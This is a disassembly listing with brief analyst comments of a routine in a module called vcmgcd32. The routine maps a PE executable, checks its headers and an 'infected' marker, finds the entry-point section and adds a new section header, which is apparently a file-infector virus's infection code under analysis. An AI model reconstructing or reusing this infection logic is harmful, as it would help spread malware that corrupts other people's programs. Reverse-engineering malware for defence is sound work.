1000214F . E9 040A0000 JMP vcmgcd32.10002B58
10002154 > 6A 00 PUSH 0 ; /hTemplateFile = NULL
10002156 . 68 80000000 PUSH 80 ; |Attributes = NORMAL
1000215B . 6A 03 PUSH 3 ; |Mode = OPEN_EXISTING
1000215D . 6A 00 PUSH 0 ; |pSecurity = NULL
1000215F . 6A 00 PUSH 0 ; |ShareMode = 0
10002161 . 68 000000C0 PUSH C0000000 ; |Access = GENERIC_READ|GENERIC_WRITE
10002166 . 8B45 08 MOV EAX,DWORD PTR SS:[EBP+8] ; |
10002169 . 50 PUSH EAX ; |FileName
1000216A . FF15 6C100010 CALL DWORD PTR DS:[<&KERNEL32.CreateFileA>] ; \CreateFileA
10002170 . 8985 04FFFFFF MOV DWORD PTR SS:[EBP-FC],EAX
10002176 . 6A 00 PUSH 0 ; /pFileSizeHigh = NULL
10002178 . 8B8D 04FFFFFF MOV ECX,DWORD PTR SS:[EBP-FC] ; |
1000217E . 51 PUSH ECX ; |hFile
1000217F . FF15 68100010 CALL DWORD PTR DS:[<&KERNEL32.GetFileSize>] ; \GetFileSize
10002185 . 8945 B8 MOV DWORD PTR SS:[EBP-48],EAX
10002188 . 83BD 04FFFFFF>CMP DWORD PTR SS:[EBP-FC],-1
1000218F . 0F84 87090000 JE vcmgcd32.10002B1C
10002195 . 817D B8 00004>CMP DWORD PTR SS:[EBP-48],1400000
1000219C . 0F83 7A090000 JNB vcmgcd32.10002B1C
100021A2 . 817D B8 00100>CMP DWORD PTR SS:[EBP-48],1000
100021A9 . 0F86 6D090000 JBE vcmgcd32.10002B1C
100021AF . 8B55 B8 MOV EDX,DWORD PTR SS:[EBP-48]
100021B2 . 8955 B0 MOV DWORD PTR SS:[EBP-50],EDX
100021B5 . 8D85 1CFFFFFF LEA EAX,DWORD PTR SS:[EBP-E4]
100021BB . 50 PUSH EAX ; /pLastWrite
100021BC . 8D4D BC LEA ECX,DWORD PTR SS:[EBP-44] ; |
100021BF . 51 PUSH ECX ; |pLastAccess
100021C0 . 8D55 D0 LEA EDX,DWORD PTR SS:[EBP-30] ; |
100021C3 . 52 PUSH EDX ; |pCreationTime
100021C4 . 8B85 04FFFFFF MOV EAX,DWORD PTR SS:[EBP-FC] ; |
100021CA . 50 PUSH EAX ; |hFile
100021CB . FF15 90100010 CALL DWORD PTR DS:[<&KERNEL32.GetFileTime>] ; \GetFileTime
100021D1 . 6A 00 PUSH 0 ; /MapName = NULL
100021D3 . 8B4D B8 MOV ECX,DWORD PTR SS:[EBP-48] ; |
100021D6 . 81C1 00500000 ADD ECX,5000 ; |
100021DC . 51 PUSH ECX ; |MaximumSizeLow
100021DD . 6A 00 PUSH 0 ; |MaximumSizeHigh = 0
100021DF . 6A 04 PUSH 4 ; |Protection = PAGE_READWRITE
100021E1 . 6A 00 PUSH 0 ; |pSecurity = NULL
100021E3 . 8B95 04FFFFFF MOV EDX,DWORD PTR SS:[EBP-FC] ; |
100021E9 . 52 PUSH EDX ; |hFile
100021EA . FF15 8C100010 CALL DWORD PTR DS:[<&KERNEL32.CreateFileMappingA>] ; \CreateFileMappingA
100021F0 . A3 10E20010 MOV DWORD PTR DS:[1000E210],EAX
100021F5 . 833D 10E20010>CMP DWORD PTR DS:[1000E210],0
100021FC . 0F84 C2080000 JE vcmgcd32.10002AC4
10002202 . 6A 00 PUSH 0 ; /MapSize = 0
10002204 . 6A 00 PUSH 0 ; |OffsetLow = 0
10002206 . 6A 00 PUSH 0 ; |OffsetHigh = 0
10002208 . 6A 02 PUSH 2 ; |AccessMode = FILE_MAP_WRITE
1000220A . A1 10E20010 MOV EAX,DWORD PTR DS:[1000E210] ; |
1000220F . 50 PUSH EAX ; |hMapObject => NULL
10002210 . FF15 7C100010 CALL DWORD PTR DS:[<&KERNEL32.MapViewOfFile>] ; \MapViewOfFile
10002216 . A3 94E60010 MOV DWORD PTR DS:[1000E694],EAX
1000221B . 833D 94E60010>CMP DWORD PTR DS:[1000E694],0 ; if a empty file
10002222 . 0F84 9C080000 JE vcmgcd32.10002AC4
10002228 . 8B0D 94E60010 MOV ECX,DWORD PTR DS:[1000E694]
1000222E . 8B51 3C MOV EDX,DWORD PTR DS:[ECX+3C] ; point to pe offset
10002231 . 8995 0CFFFFFF MOV DWORD PTR SS:[EBP-F4],EDX
10002237 . 8B85 0CFFFFFF MOV EAX,DWORD PTR SS:[EBP-F4]
1000223D . 3B45 B8 CMP EAX,DWORD PTR SS:[EBP-48]
10002240 . 0F83 7E080000 JNB vcmgcd32.10002AC4
10002246 . 8B0D 94E60010 MOV ECX,DWORD PTR DS:[1000E694]
1000224C . 0FBE51 18 MOVSX EDX,BYTE PTR DS:[ECX+18] ; infected flag??
10002250 . 83FA 40 CMP EDX,40
10002253 . 0F8C 6B080000 JL vcmgcd32.10002AC4
10002259 . 68 D8000000 PUSH 0D8
1000225E . A1 94E60010 MOV EAX,DWORD PTR DS:[1000E694]
10002263 . 0385 0CFFFFFF ADD EAX,DWORD PTR SS:[EBP-F4]
10002269 . 50 PUSH EAX
1000226A . 68 10900010 PUSH vcmgcd32.10009010
1000226F . E8 2C250000 CALL vcmgcd32.100047A0
10002274 . 83C4 0C ADD ESP,0C
10002277 . 813D 10900010>CMP DWORD PTR DS:[10009010],4550
10002281 . 0F85 3D080000 JNZ vcmgcd32.10002AC4
10002287 . 33C9 XOR ECX,ECX
10002289 . 66:8B0D 28900>MOV CX,WORD PTR DS:[10009028] ; GetMagicNumber
10002290 . 81F9 0B010000 CMP ECX,10B
10002296 . 0F85 28080000 JNZ vcmgcd32.10002AC4
1000229C . 833D 38900010>CMP DWORD PTR DS:[10009038],0 ; GetOEP
100022A3 . 0F84 1B080000 JE vcmgcd32.10002AC4
100022A9 . 8B15 48900010 MOV EDX,DWORD PTR DS:[10009048] ; ?? GetSectionAlignment or OEP file offset
100022AF . 52 PUSH EDX ; /Arg2 => 00000000
100022B0 . 8B45 CC MOV EAX,DWORD PTR SS:[EBP-34] ; |
100022B3 . 50 PUSH EAX ; |Arg1
100022B4 . E8 B7FAFFFF CALL vcmgcd32.10001D70 ; \vcmgcd32.10001D70
100022B9 . 83C4 08 ADD ESP,8
100022BC . 8945 CC MOV DWORD PTR SS:[EBP-34],EAX
100022BF . C785 14FFFFFF>MOV DWORD PTR SS:[EBP-EC],0
100022C9 . EB 0F JMP SHORT vcmgcd32.100022DA
100022CB > 8B8D 14FFFFFF MOV ECX,DWORD PTR SS:[EBP-EC]
100022D1 . 83C1 01 ADD ECX,1
100022D4 . 898D 14FFFFFF MOV DWORD PTR SS:[EBP-EC],ECX
100022DA > 33D2 XOR EDX,EDX
100022DC . 66:8B15 16900>MOV DX,WORD PTR DS:[10009016] ; GetNumberOfSections
100022E3 . 83EA 01 SUB EDX,1 ; sectionNum - 1
100022E6 . 3995 14FFFFFF CMP DWORD PTR SS:[EBP-EC],EDX
100022EC . 0F87 03010000 JA vcmgcd32.100023F5 ; > sectionNo then jmp
100022F2 . 6A 28 PUSH 28
100022F4 . 33C0 XOR EAX,EAX
100022F6 . 66:A1 2490001>MOV AX,WORD PTR DS:[10009024] ; sizeofOptionHeader
100022FC . 8B8D 0CFFFFFF MOV ECX,DWORD PTR SS:[EBP-F4]
10002302 . 03C8 ADD ECX,EAX
10002304 . 8B95 14FFFFFF MOV EDX,DWORD PTR SS:[EBP-EC]
1000230A . 6BD2 28 IMUL EDX,EDX,28
1000230D . 0315 94E60010 ADD EDX,DWORD PTR DS:[1000E694]
10002313 . 8D440A 18 LEA EAX,DWORD PTR DS:[EDX+ECX+18] ; GetSectionNameOffset
10002317 . 50 PUSH EAX
10002318 . 68 30E20010 PUSH vcmgcd32.1000E230
1000231D . E8 7E240000 CALL vcmgcd32.100047A0
10002322 . 83C4 0C ADD ESP,0C
10002325 . 83BD 14FFFFFF>CMP DWORD PTR SS:[EBP-EC],1
1000232C . 75 10 JNZ SHORT vcmgcd32.1000233E
1000232E . 68 30E20010 PUSH vcmgcd32.1000E230 ; /String2 = ""
10002333 . 68 70E20010 PUSH vcmgcd32.1000E270 ; |String1 = vcmgcd32.1000E270
10002338 . FF15 80100010 CALL DWORD PTR DS:[<&KERNEL32.lstrcpyA>] ; \lstrcpyA
1000233E > 8B0D 38900010 MOV ECX,DWORD PTR DS:[10009038]
10002344 . 3B0D 3CE20010 CMP ECX,DWORD PTR DS:[1000E23C]
1000234A . 72 5E JB SHORT vcmgcd32.100023AA
1000234C . 8B15 3CE20010 MOV EDX,DWORD PTR DS:[1000E23C] ; v.Offset
10002352 . 0315 38E20010 ADD EDX,DWORD PTR DS:[1000E238] ; v.Size
10002358 . 3915 38900010 CMP DWORD PTR DS:[10009038],EDX
1000235E . 73 4A JNB SHORT vcmgcd32.100023AA
10002360 . 833D 40E20010>CMP DWORD PTR DS:[1000E240],0
10002367 . 74 41 JE SHORT vcmgcd32.100023AA
10002369 . 833D 38E20010>CMP DWORD PTR DS:[1000E238],0
10002370 . 74 38 JE SHORT vcmgcd32.100023AA
10002372 . A1 3CE20010 MOV EAX,DWORD PTR DS:[1000E23C]
10002377 . 8985 24FFFFFF MOV DWORD PTR SS:[EBP-DC],EAX
1000237D . 8B0D 44E20010 MOV ECX,DWORD PTR DS:[1000E244]
10002383 . 898D 18FFFFFF MOV DWORD PTR SS:[EBP-E8],ECX
10002389 . 8B15 38900010 MOV EDX,DWORD PTR DS:[10009038]
1000238F . 2B15 3CE20010 SUB EDX,DWORD PTR DS:[1000E23C]
10002395 . 0315 44E20010 ADD EDX,DWORD PTR DS:[1000E244]
1000239B . 8955 AC MOV DWORD PTR SS:[EBP-54],EDX
1000239E . 8B85 14FFFFFF MOV EAX,DWORD PTR SS:[EBP-EC]
100023A4 . 8985 28FFFFFF MOV DWORD PTR SS:[EBP-D8],EAX
100023AA > 8B8D 08FFFFFF MOV ECX,DWORD PTR SS:[EBP-F8]
100023B0 . 3B0D 3CE20010 CMP ECX,DWORD PTR DS:[1000E23C]
100023B6 . 73 15 JNB SHORT vcmgcd32.100023CD
100023B8 . 8B15 3CE20010 MOV EDX,DWORD PTR DS:[1000E23C]
100023BE . 8995 08FFFFFF MOV DWORD PTR SS:[EBP-F8],EDX
100023C4 . 8B85 14FFFFFF MOV EAX,DWORD PTR SS:[EBP-EC]
100023CA . 8945 E0 MOV DWORD PTR SS:[EBP-20],EAX
100023CD > 8B8D 2CFFFFFF MOV ECX,DWORD PTR SS:[EBP-D4]
100023D3 . 3B0D 44E20010 CMP ECX,DWORD PTR DS:[1000E244]
100023D9 . 73 15 JNB SHORT vcmgcd32.100023F0
100023DB . 8B15 44E20010 MOV EDX,DWORD PTR DS:[1000E244]
100023E1 . 8995 2CFFFFFF MOV DWORD PTR SS:[EBP-D4],EDX
100023E7 . 8B85 14FFFFFF MOV EAX,DWORD PTR SS:[EBP-EC]
100023ED . 8945 E4 MOV DWORD PTR SS:[EBP-1C],EAX
100023F0 >^ E9 D6FEFFFF JMP vcmgcd32.100022CB ; find OEP's section, Get number of section
100023F5 > 6A 28 PUSH 28
100023F7 . 33C9 XOR ECX,ECX
100023F9 . 66:8B0D 24900>MOV CX,WORD PTR DS:[10009024] ; SizeOfOptionHeader
10002400 . 8B95 0CFFFFFF MOV EDX,DWORD PTR SS:[EBP-F4]
10002406 . 03D1 ADD EDX,ECX
10002408 . 8B45 E4 MOV EAX,DWORD PTR SS:[EBP-1C]
1000240B . 6BC0 28 IMUL EAX,EAX,28
1000240E . 0305 94E60010 ADD EAX,DWORD PTR DS:[1000E694]
10002414 . 8D4C10 18 LEA ECX,DWORD PTR DS:[EAX+EDX+18]
10002418 . 51 PUSH ECX
10002419 . 68 30E20010 PUSH vcmgcd32.1000E230
1000241E . E8 7D230000 CALL vcmgcd32.100047A0
10002423 . 83C4 0C ADD ESP,0C
10002426 . 8B15 4C900010 MOV EDX,DWORD PTR DS:[1000904C]
1000242C . 52 PUSH EDX ; /Arg2 => 00000000
1000242D . A1 44E20010 MOV EAX,DWORD PTR DS:[1000E244] ; |
10002432 . 0305 40E20010 ADD EAX,DWORD PTR DS:[1000E240] ; |
10002438 . 50 PUSH EAX ; |Arg1
10002439 . E8 32F9FFFF CALL vcmgcd32.10001D70 ; \vcmgcd32.10001D70
1000243E . 83C4 08 ADD ESP,8
10002441 . 8945 C8 MOV DWORD PTR SS:[EBP-38],EAX
10002444 . C705 68900010>MOV DWORD PTR DS:[10009068],0
1000244E . 8B0D 48900010 MOV ECX,DWORD PTR DS:[10009048]
10002454 . 51 PUSH ECX ; /Arg2 => 00000000
10002455 . 8B55 CC MOV EDX,DWORD PTR SS:[EBP-34] ; |
10002458 . 0315 60900010 ADD EDX,DWORD PTR DS:[10009060] ; |
1000245E . 52 PUSH EDX ; |Arg1
1000245F . E8 0CF9FFFF CALL vcmgcd32.10001D70 ; \vcmgcd32.10001D70
10002464 . 83C4 08 ADD ESP,8
10002467 . A3 60900010 MOV DWORD PTR DS:[10009060],EAX
1000246C . A1 38900010 MOV EAX,DWORD PTR DS:[10009038]
10002471 . 2B85 24FFFFFF SUB EAX,DWORD PTR SS:[EBP-DC]
10002477 . 0385 18FFFFFF ADD EAX,DWORD PTR SS:[EBP-E8]
1000247D . 8985 18FFFFFF MOV DWORD PTR SS:[EBP-E8],EAX
10002483 . 68 30E20010 PUSH vcmgcd32.1000E230 ; /String2 = ""
10002488 . 68 E8900010 PUSH vcmgcd32.100090E8 ; |String1 = vcmgcd32.100090E8
1000248D . FF15 80100010 CALL DWORD PTR DS:[<&KERNEL32.lstrcpyA>] ; \lstrcpyA
10002493 . 68 E8900010 PUSH vcmgcd32.100090E8 ; /StringOrChar = ""
10002498 . FF15 20110010 CALL DWORD PTR DS:[<&USER32.CharUpperA>] ; \CharUpperA
1000249E . 833D 4CE20010>CMP DWORD PTR DS:[1000E24C],0
100024A5 . 0F85 19060000 JNZ vcmgcd32.10002AC4
100024AB . 8B4D C8 MOV ECX,DWORD PTR SS:[EBP-38]
100024AE . 030D 48900010 ADD ECX,DWORD PTR DS:[10009048]
100024B4 . 3B4D B8 CMP ECX,DWORD PTR SS:[EBP-48]
100024B7 . 0F86 07060000 JBE vcmgcd32.10002AC4
100024BD . 8B55 E4 MOV EDX,DWORD PTR SS:[EBP-1C]
100024C0 . 3B55 E0 CMP EDX,DWORD PTR SS:[EBP-20]
100024C3 . 0F85 FB050000 JNZ vcmgcd32.10002AC4
100024C9 . 813D 54E20010>CMP DWORD PTR DS:[1000E254],E0000020
100024D3 . 73 4B JNB SHORT vcmgcd32.10002520
100024D5 . A1 30610010 MOV EAX,DWORD PTR DS:[10006130]
100024DA . 50 PUSH EAX ; /Arg2 => 10006438 ASCII "TEXT"
100024DB . 68 E8900010 PUSH vcmgcd32.100090E8 ; |Arg1 = 100090E8
100024E0 . E8 DBECFFFF CALL vcmgcd32.100011C0 ; \vcmgcd32.100011C0
100024E5 . 83C4 08 ADD ESP,8
100024E8 . 85C0 TEST EAX,EAX
100024EA . 75 34 JNZ SHORT vcmgcd32.10002520
100024EC . 8B0D 34610010 MOV ECX,DWORD PTR DS:[10006134] ; vcmgcd32.10006440
100024F2 . 51 PUSH ECX ; /Arg2 => 10006440 ASCII "UPX"
100024F3 . 68 E8900010 PUSH vcmgcd32.100090E8 ; |Arg1 = 100090E8
100024F8 . E8 C3ECFFFF CALL vcmgcd32.100011C0 ; \vcmgcd32.100011C0
100024FD . 83C4 08 ADD ESP,8
10002500 . 85C0 TEST EAX,EAX
10002502 . 75 1C JNZ SHORT vcmgcd32.10002520
10002504 . 8B15 38610010 MOV EDX,DWORD PTR DS:[10006138] ; vcmgcd32.10006448
1000250A . 52 PUSH EDX ; /Arg2 => 10006448 ASCII "CODE"
1000250B . 68 E8900010 PUSH vcmgcd32.100090E8 ; |Arg1 = 100090E8
10002510 . E8 ABECFFFF CALL vcmgcd32.100011C0 ; \vcmgcd32.100011C0
10002515 . 83C4 08 ADD ESP,8
10002518 . 85C0 TEST EAX,EAX
1000251A . 0F84 EF000000 JE vcmgcd32.1000260F
10002520 > 833D 40E20010>CMP DWORD PTR DS:[1000E240],0
10002527 . 0F84 E2000000 JE vcmgcd32.1000260F
1000252D . 833D 38E20010>CMP DWORD PTR DS:[1000E238],0
10002534 . 0F84 D5000000 JE vcmgcd32.1000260F
1000253A . A1 40E20010 MOV EAX,DWORD PTR DS:[1000E240]
1000253F . 3B05 38E20010 CMP EAX,DWORD PTR DS:[1000E238]
10002545 . 72 17 JB SHORT vcmgcd32.1000255E
10002547 . 8B0D 40E20010 MOV ECX,DWORD PTR DS:[1000E240]
1000254D . 2B0D 38E20010 SUB ECX,DWORD PTR DS:[1000E238]
10002553 . 034D CC ADD ECX,DWORD PTR SS:[EBP-34]
10002556 . 898D F8FEFFFF MOV DWORD PTR SS:[EBP-108],ECX
1000255C . EB 09 JMP SHORT vcmgcd32.10002567
1000255E > 8B55 CC MOV EDX,DWORD PTR SS:[EBP-34]
10002561 . 8995 F8FEFFFF MOV DWORD PTR SS:[EBP-108],EDX
10002567 > A1 38E20010 MOV EAX,DWORD PTR DS:[1000E238]
1000256C . 0385 F8FEFFFF ADD EAX,DWORD PTR SS:[EBP-108]
10002572 . A3 38E20010 MOV DWORD PTR DS:[1000E238],EAX
10002577 . 8B0D 4C900010 MOV ECX,DWORD PTR DS:[1000904C]
1000257D . 51 PUSH ECX ; /Arg2 => 00000000
1000257E . 8B15 40E20010 MOV EDX,DWORD PTR DS:[1000E240] ; |
10002584 . 0355 CC ADD EDX,DWORD PTR SS:[EBP-34] ; |
10002587 . 52 PUSH EDX ; |Arg1
10002588 . E8 E3F7FFFF CALL vcmgcd32.10001D70 ; \vcmgcd32.10001D70
1000258D . 83C4 08 ADD ESP,8
10002590 . A3 40E20010 MOV DWORD PTR DS:[1000E240],EAX
10002595 . A1 48900010 MOV EAX,DWORD PTR DS:[10009048]
1000259A . 50 PUSH EAX ; /Arg2 => 00000000
1000259B . 8B0D 40E20010 MOV ECX,DWORD PTR DS:[1000E240] ; |
100025A1 . 51 PUSH ECX ; |Arg1 => 00000000
100025A2 . E8 C9F7FFFF CALL vcmgcd32.10001D70 ; \vcmgcd32.10001D70
100025A7 . 83C4 08 ADD ESP,8
100025AA . A3 38E20010 MOV DWORD PTR DS:[1000E238],EAX
100025AF . C705 54E20010>MOV DWORD PTR DS:[1000E254],E0000020
100025B9 . C705 4CE20010>MOV DWORD PTR DS:[1000E24C],11
100025C3 . 6A 28 PUSH 28
100025C5 . 68 30E20010 PUSH vcmgcd32.1000E230
100025CA . 33D2 XOR EDX,EDX
100025CC . 66:8B15 24900>MOV DX,WORD PTR DS:[10009024]
100025D3 . 8B85 0CFFFFFF MOV EAX,DWORD PTR SS:[EBP-F4]
100025D9 . 03C2 ADD EAX,EDX
100025DB . 8B4D E4 MOV ECX,DWORD PTR SS:[EBP-1C]
100025DE . 6BC9 28 IMUL ECX,ECX,28
100025E1 . 030D 94E60010 ADD ECX,DWORD PTR DS:[1000E694]
100025E7 . 8D5401 18 LEA EDX,DWORD PTR DS:[ECX+EAX+18]
100025EB . 52 PUSH EDX
100025EC . E8 AF210000 CALL vcmgcd32.100047A0
100025F1 . 83C4 0C ADD ESP,0C
100025F4 . A1 3CE20010 MOV EAX,DWORD PTR DS:[1000E23C]
100025F9 . 0305 40E20010 ADD EAX,DWORD PTR DS:[1000E240]
100025FF . 2B45 CC SUB EAX,DWORD PTR SS:[EBP-34]
10002602 . 2B05 38900010 SUB EAX,DWORD PTR DS:[10009038]
10002608 . 8945 C4 MOV DWORD PTR SS:[EBP-3C],EAX
1000260B . C645 DC 01 MOV BYTE PTR SS:[EBP-24],1
1000260F > 8B4D DC MOV ECX,DWORD PTR SS:[EBP-24]
10002612 . 81E1 FF000000 AND ECX,0FF
10002618 . 85C9 TEST ECX,ECX
1000261A . 0F85 45020000 JNZ vcmgcd32.10002865
10002620 . 66:8B15 16900>MOV DX,WORD PTR DS:[10009016] ; NumberOfSections
10002627 . 66:83C2 01 ADD DX,1 ; ++
1000262B . 66:8915 16900>MOV WORD PTR DS:[10009016],DX
10002632 . C785 14FFFFFF>MOV DWORD PTR SS:[EBP-EC],0
1000263C . 833D E0900010>CMP DWORD PTR DS:[100090E0],0
10002643 . 74 4F JE SHORT vcmgcd32.10002694
10002645 . A1 E4900010 MOV EAX,DWORD PTR DS:[100090E4]
1000264A . 50 PUSH EAX
1000264B . 8B0D 94E60010 MOV ECX,DWORD PTR DS:[1000E694]
10002651 . 030D E0900010 ADD ECX,DWORD PTR DS:[100090E0]
10002657 . 51 PUSH ECX
10002658 . 68 E8900010 PUSH vcmgcd32.100090E8
1000265D . E8 3E210000 CALL vcmgcd32.100047A0
10002662 . 83C4 0C ADD ESP,0C
10002665 . 8B15 E0900010 MOV EDX,DWORD PTR DS:[100090E0]
1000266B . 83C2 28 ADD EDX,28
1000266E . 8915 E0900010 MOV DWORD PTR DS:[100090E0],EDX
10002674 . A1 E4900010 MOV EAX,DWORD PTR DS:[100090E4]
10002679 . 50 PUSH EAX
1000267A . 68 E8900010 PUSH vcmgcd32.100090E8
1000267F . 8B0D 94E60010 MOV ECX,DWORD PTR DS:[1000E694]
10002685 . 030D E0900010 ADD ECX,DWORD PTR DS:[100090E0]
1000268B . 51 PUSH ECX
1000268C . E8 0F210000 CALL vcmgcd32.100047A0
10002691 . 83C4 0C ADD ESP,0C
10002694 > 8B55 08 MOV EDX,DWORD PTR SS:[EBP+8]
10002697 . 52 PUSH EDX ; /String
10002698 . FF15 FC100010 CALL DWORD PTR DS:[<&KERNEL32.lstrlenA>] ; \lstrlenA
1000269E . 8B4D 08 MOV ECX,DWORD PTR SS:[EBP+8]
100026A1 . 8D5401 FB LEA EDX,DWORD PTR DS:[ECX+EAX-5]
100026A5 . 52 PUSH EDX ; /StringOrChar
100026A6 . FF15 18110010 CALL DWORD PTR DS:[<&USER32.CharLowerA>] ; \CharLowerA
100026AC . 0FBE05 70E200>MOVSX EAX,BYTE PTR DS:[1000E270]
100026B3 . 33C9 XOR ECX,ECX
100026B5 . 83F8 2E CMP EAX,2E
100026B8 . 0F94C1 SETE CL
100026BB . 81C1 70E20010 ADD ECX,vcmgcd32.1000E270
100026C1 . 51 PUSH ECX ; /<%s>
100026C2 . 8B55 08 MOV EDX,DWORD PTR SS:[EBP+8] ; |
100026C5 . 52 PUSH EDX ; |/String
100026C6 . FF15 FC100010 CALL DWORD PTR DS:[<&KERNEL32.lstrlenA>] ; |\lstrlenA
100026CC . 8B4D 08 MOV ECX,DWORD PTR SS:[EBP+8] ; |
100026CF . 0FBE5401 FB MOVSX EDX,BYTE PTR DS:[ECX+EAX-5] ; |
100026D4 . 52 PUSH EDX ; |<%c>
100026D5 . 68 A46A0010 PUSH vcmgcd32.10006AA4 ; |Format = ".%c%s"
100026DA . 68 30E20010 PUSH vcmgcd32.1000E230 ; |s = vcmgcd32.1000E230
100026DF . FF15 1C110010 CALL DWORD PTR DS:[<&USER32.wsprintfA>] ; \wsprintfA
100026E5 . 83C4 10 ADD ESP,10
100026E8 . 68 70E20010 PUSH vcmgcd32.1000E270 ; /String = ""
100026ED . FF15 FC100010 CALL DWORD PTR DS:[<&KERNEL32.lstrlenA>] ; \lstrlenA
100026F3 . 83F8 01 CMP EAX,1
100026F6 . 7E 30 JLE SHORT vcmgcd32.10002728
100026F8 . 0FBE05 72E200>MOVSX EAX,BYTE PTR DS:[1000E272]
100026FF . 83F8 60 CMP EAX,60
10002702 . 7E 19 JLE SHORT vcmgcd32.1000271D
10002704 . 0FBE0D 72E200>MOVSX ECX,BYTE PTR DS:[1000E272]
1000270B . 83F9 7B CMP ECX,7B
1000270E . 7D 0D JGE SHORT vcmgcd32.1000271D
10002710 . 68 30E20010 PUSH vcmgcd32.1000E230 ; /StringOrChar = ""
10002715 . FF15 18110010 CALL DWORD PTR DS:[<&USER32.CharLowerA>] ; \CharLowerA
1000271B . EB 0B JMP SHORT vcmgcd32.10002728
1000271D > 68 30E20010 PUSH vcmgcd32.1000E230 ; /StringOrChar = ""
10002722 . FF15 20110010 CALL DWORD PTR DS:[<&USER32.CharUpperA>] ; \CharUpperA
10002728 > 8B15 4C900010 MOV EDX,DWORD PTR DS:[1000904C]
1000272E . 52 PUSH EDX ; /Arg2 => 00000000
1000272F . A1 60900010 MOV EAX,DWORD PTR DS:[10009060] ; |
10002734 . 2B45 CC SUB EAX,DWORD PTR SS:[EBP-34] ; |
10002737 . 50 PUSH EAX ; |Arg1
10002738 . E8 33F6FFFF CALL vcmgcd32.10001D70 ; \vcmgcd32.10001D70
1000273D . 83C4 08 ADD ESP,8
10002740 . A3 3CE20010 MOV DWORD PTR DS:[1000E23C],EAX
10002745 . 8B4D CC MOV ECX,DWORD PTR SS:[EBP-34]
10002748 . 890D 38E20010 MOV DWORD PTR DS:[1000E238],ECX
1000274E . 8B55 CC MOV EDX,DWORD PTR SS:[EBP-34]
10002751 . 8915 40E20010 MOV DWORD PTR DS:[1000E240],EDX
10002757 . 8B45 C8 MOV EAX,DWORD PTR SS:[EBP-38]
1000275A . A3 44E20010 MOV DWORD PTR DS:[1000E244],EAX
1000275F . C705 54E20010>MOV DWORD PTR DS:[1000E254],E0000020
10002769 . C705 4CE20010>MOV DWORD PTR DS:[1000E24C],11
10002773 . 6A 28 PUSH 28
10002775 . 33C9 XOR ECX,ECX
10002777 . 66:8B0D 24900>MOV CX,WORD PTR DS:[10009024]
1000277E . 8B95 0CFFFFFF MOV EDX,DWORD PTR SS:[EBP-F4]
10002784 . 03D1 ADD EDX,ECX
10002786 . 8B45 E4 MOV EAX,DWORD PTR SS:[EBP-1C]
10002789 . 83C0 01 ADD EAX,1
1000278C . 6BC0 28 IMUL EAX,EAX,28
1000278F . 0305 94E60010 ADD EAX,DWORD PTR DS:[1000E694]
10002795 . 8D4C10 18 LEA ECX,DWORD PTR DS:[EAX+EDX+18]
10002799 . 51 PUSH ECX
1000279A . 68 E8900010 PUSH vcmgcd32.100090E8
1000279F . E8 FC1F0000 CALL vcmgcd32.100047A0
100027A4 . 83C4 0C ADD ESP,0C
100027A7 . C745 C4 13000>MOV DWORD PTR SS:[EBP-3C],13
100027AE . 33D2 XOR EDX,EDX
100027B0 . 66:8B15 24900>MOV DX,WORD PTR DS:[10009024]
100027B7 . 8B85 0CFFFFFF MOV EAX,DWORD PTR SS:[EBP-F4]
100027BD . 03C2 ADD EAX,EDX
100027BF . 33C9 XOR ECX,ECX
100027C1 . 66:8B0D 16900>MOV CX,WORD PTR DS:[10009016]
100027C8 . 6BC9 28 IMUL ECX,ECX,28
100027CB . 8B15 E4900010 MOV EDX,DWORD PTR DS:[100090E4]
100027D1 . 03D0 ADD EDX,EAX
100027D3 . 8D4411 18 LEA EAX,DWORD PTR DS:[ECX+EDX+18]
100027D7 . 3B05 64900010 CMP EAX,DWORD PTR DS:[10009064]
100027DD . 76 2D JBE SHORT vcmgcd32.1000280C
100027DF . C745 C4 00000>MOV DWORD PTR SS:[EBP-3C],0
100027E6 . EB 09 JMP SHORT vcmgcd32.100027F1
100027E8 > 8B4D C4 MOV ECX,DWORD PTR SS:[EBP-3C]
100027EB . 83C1 01 ADD ECX,1
100027EE . 894D C4 MOV DWORD PTR SS:[EBP-3C],ECX
100027F1 > 837D C4 13 CMP DWORD PTR SS:[EBP-3C],13
100027F5 . 74 15 JE SHORT vcmgcd32.1000280C
100027F7 . 8B55 C4 MOV EDX,DWORD PTR SS:[EBP-3C]
100027FA . 33C0 XOR EAX,EAX
100027FC . 66:8B0455 E89>MOV AX,WORD PTR DS:[EDX*2+100090E8]
10002804 . 85C0 TEST EAX,EAX
10002806 . 74 02 JE SHORT vcmgcd32.1000280A
10002808 . EB 02 JMP SHORT vcmgcd32.1000280C
1000280A >^ EB DC JMP SHORT vcmgcd32.100027E8
1000280C > 837D C4 13 CMP DWORD PTR SS:[EBP-3C],13
10002810 . 75 4C JNZ SHORT vcmgcd32.1000285E
10002812 . 6A 28 PUSH 28
10002814 . 68 30E20010 PUSH vcmgcd32.1000E230
10002819 . 33C9 XOR ECX,ECX
1000281B . 66:8B0D 24900>MOV CX,WORD PTR DS:[10009024]
10002822 . 8B95 0CFFFFFF MOV EDX,DWORD PTR SS:[EBP-F4]
10002828 . 03D1 ADD EDX,ECX
1000282A . 8B45 E4 MOV EAX,DWORD PTR SS:[EBP-1C]
1000282D . 83C0 01 ADD EAX,1
10002830 . 6BC0 28 IMUL EAX,EAX,28
10002833 . 0305 94E60010 ADD EAX,DWORD PTR DS:[1000E694]
10002839 . 8D4C10 18 LEA ECX,DWORD PTR DS:[EAX+EDX+18]
1000283D . 51 PUSH ECX
1000283E . E8 5D1F0000 CALL vcmgcd32.100047A0 ; add new section
10002843 . 83C4 0C ADD ESP,0C
10002846 . 8B15 60900010 MOV EDX,DWORD PTR DS:[10009060]
1000284C . 2B55 CC SUB EDX,DWORD PTR SS:[EBP-34]
1000284F . 2B15 38900010 SUB EDX,DWORD PTR DS:[10009038]
10002855 . 8955 C4 MOV DWORD PTR SS:[EBP-3C],EDX
10002858 . C645 DC 01 MOV BYTE PTR SS:[EBP-24],1
1000285C . EB 07 JMP SHORT vcmgcd32.10002865
1000285E > C745 C4 00000>MOV DWORD PTR SS:[EBP-3C],0
10002865 > 8B45 DC MOV EAX,DWORD PTR SS:[EBP-24]
10002868 . 25 FF000000 AND EAX,0FF
1000286D . 85C0 TEST EAX,EAX
1000286F . 0F84 4F020000 JE vcmgcd32.10002AC4
10002875 . 837D C4 00 CMP DWORD PTR SS:[EBP-3C],0
10002879 . 0F84 45020000 JE vcmgcd32.10002AC4
1000287F . 6A 28 PUSH 28
10002881 . 33C9 XOR ECX,ECX
10002883 . 66:8B0D 24900>MOV CX,WORD PTR DS:[10009024]
